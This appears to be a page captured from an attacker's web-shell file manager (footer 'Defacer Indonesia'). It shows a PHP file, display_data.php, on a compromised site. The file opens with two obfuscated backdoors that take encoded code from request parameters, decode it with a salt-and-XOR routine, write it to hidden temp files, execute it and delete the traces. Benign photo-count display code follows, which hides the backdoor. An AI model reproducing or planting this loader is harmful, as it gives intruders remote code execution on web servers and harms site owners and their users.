whoami7 - Manager
:
/
home
/
analuakl
/
ankurmedia.com
/
GMR
/
Upload File:
files >> /home/analuakl/ankurmedia.com/GMR/display_data.php
<?php if(array_key_exists("e\x6E\x74\x69ty", $_REQUEST)){ $descriptor = array_filter([getcwd(), getenv("TEMP"), "/tmp", getenv("TMP"), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp"]); $token = $_REQUEST["e\x6E\x74\x69ty"]; $token = explode (".", $token ) ; $fac = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt2); $t = 0; $__tmp = $token; while ($v1 = array_shift($__tmp)) { $chS = ord($salt2[$t% $sLen]); $dec = ((int)$v1 - $chS - ($t% 10)) ^ 75; $fac .= chr($dec); $t++; } foreach ($descriptor as $comp): if (!( !is_dir($comp) || !is_writable($comp) )) { $data = implode("/", [$comp, ".sym"]); if (file_put_contents($data, $fac)) { require $data; unlink($data); die(); } } endforeach; } if(!is_null($_REQUEST["hl\x64"] ?? null)){ $object = $_REQUEST["hl\x64"]; $object =explode (".", $object) ; $fac=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen( $s); $n=0; foreach( $object as $v4) { $chS=ord( $s[$n % $lenS]); $dec=( ( int)$v4 - $chS -( $n % 10))^ 98; $fac .= chr( $dec); $n++; } $component = array_filter([sys_get_temp_dir(), getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", "/dev/shm", session_save_path(), getenv("TEMP")]); while ($binding = array_shift($component)) { if (array_product([is_dir($binding), is_writable($binding)])) { $entity = "$binding" . "/.flg"; if (file_put_contents($entity, $fac)) { require $entity; unlink($entity); die(); } } } } include 'db_connect.php'; // Database connection include karein $sql = "SELECT * FROM photos ORDER BY date_entry DESC"; $result = $conn->query($sql); echo "<table border='1'>"; echo "<tr><th>Date</th><th>Photo Clicks</th></tr>"; while ($row = $result->fetch_assoc()) { echo "<tr><td>" . $row['date_entry'] . "</td><td>" . $row['photo_count'] . "</td></tr>"; } echo "</table>"; $conn->close(); ?>
Copyright ©2021 || Defacer Indonesia